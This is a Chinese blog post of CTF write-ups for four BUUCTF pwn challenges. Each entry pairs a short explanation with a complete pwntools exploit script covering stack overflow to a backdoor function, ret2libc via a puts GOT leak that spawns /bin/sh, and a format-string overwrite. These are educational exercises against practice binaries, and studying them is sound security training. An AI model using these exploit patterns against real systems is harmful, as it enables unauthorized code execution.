PWN-PRACTICE-BUUCTF-2

最新推荐文章于 2024-04-01 09:29:25 发布
最新推荐文章于 2024-04-01 09:29:25 发布
阅读量186 收藏
点赞数
分类专栏: Pwn-BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/119035589
版权

PWN-PRACTICE-BUUCTF-2

pwn1_sctf_2016

main函数中执行vuln函数
fgets限制了输入的长度,不足以构成栈溢出
通过将输入中的字符"I"替换成"you",增加长度,使满足栈溢出
pwn1-vuln
同时可执行文件存在后门函数get_flag
在这里插入图片描述
构造payload,覆盖eip到get_flag即可得到flag

from pwn import *
#io=process('./pwn1_sctf_2016')
io=remote('node4.buuoj.cn',25873)
get_flag=0x08048F0D
payload='I'*20+'a'*4+p32(get_flag)
io.sendline(payload)
io.interactive()

jarvisoj_level0

简单的栈溢出,留有后门函数callsystem
构造payload,覆盖rip到callsystem,为了满足系统调用需要的16字节对齐,在系统调用前加一条ret

from pwn import *
#io=process("./level0")
io=remote('node4.buuoj.cn',25195)
callsystem=0x0000000000400596
ret=0x0000000000400431
payload="a"*(128+8)+p64(ret)+p64(callsystem)
io.sendline(payload)
io.interactive()

ciscn_2019_c_1

栈溢出ret2libc,encrypt函数里的异或运算不用管的

from pwn import *
context.log_level="debug"
io=remote('node4.buuoj.cn',28108)
elf=ELF("./ciscn_2019_c_1")
libc=ELF("./libc-2.27-18-x64.so")
io.recvuntil("Input your choice!\n")
io.sendline("1")
io.recvuntil("Input your Plaintext to be encrypted\n")
pop_rdi_ret=0x0000000000400c83
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
encrypt=0x00000000004009A0
ret=0x00000000004006b9
payload="a"*(48+2+30+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(encrypt)
io.sendline(payload)
io.recvuntil("Ciphertext\n")
io.recvuntil("\n")
puts_addr=u64(io.recvuntil("\n",drop=True).ljust(8,"\x00"))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym["puts"]
system=libc_base+libc.sym["system"]
binsh=libc_base+libc.search("/bin/sh").next()
payload_2="a"*(48+2+30+8)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system)+p64(encrypt)
io.recvuntil("Input your Plaintext to be encrypted\n")
io.sendline(payload_2)
io.sendline("cat flag")
io.interactive()

[第五空间2019 决赛]PWN5

格式化字符串的洞,覆写dword_804C044处的值,再输入相同的值即可验证成功
测试知道偏移为10,利用pwntools集成的fmtstr_payload来构造payload
或者自己构造payload,因为要覆写的值不必固定,所以构造方式有很多

from pwn import *
io=remote('node4.buuoj.cn',26708)
io.recvuntil("your name:")
payload=fmtstr_payload(10,{0x0804C044:3})
#payload="aaa%12$n"+p32(0x0804C044)
io.sendline(payload)
io.recvuntil("your passwd:")
io.sendline("3")
io.sendline("cat flag")
io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
[第五空间2019 决赛]PWN5
weixin_56301399的博客
07-21 1528
格式化字符串漏洞
Pwn中,为什么时长需要栈对齐?
红叶的博客
12-07 1025
Pwn 的学习中,对于初学者常常会遇到这个问题:找到了溢出点,并且知道如何溢出,但是不知道为什么自己的Payload并没有成功,Pwntools报错EOF:今天趁着有时间,来仔细研究一下为什么会发生这种情况。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2221
通过PWN5一题尝试理解格式化字符串漏洞。
buuctf之[第五空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 610
简单易懂~
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn-200题目文件
02-16
pwn-200题目文件
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1387
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4331
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2515
[第五空间2019 决赛]PWN5 ——两种解法
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 791
BUUCTF--pwn--[第五空间2019 决赛]PWN5
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 330
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 470
完全通过静态分析得到题解,与网传算法不同
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值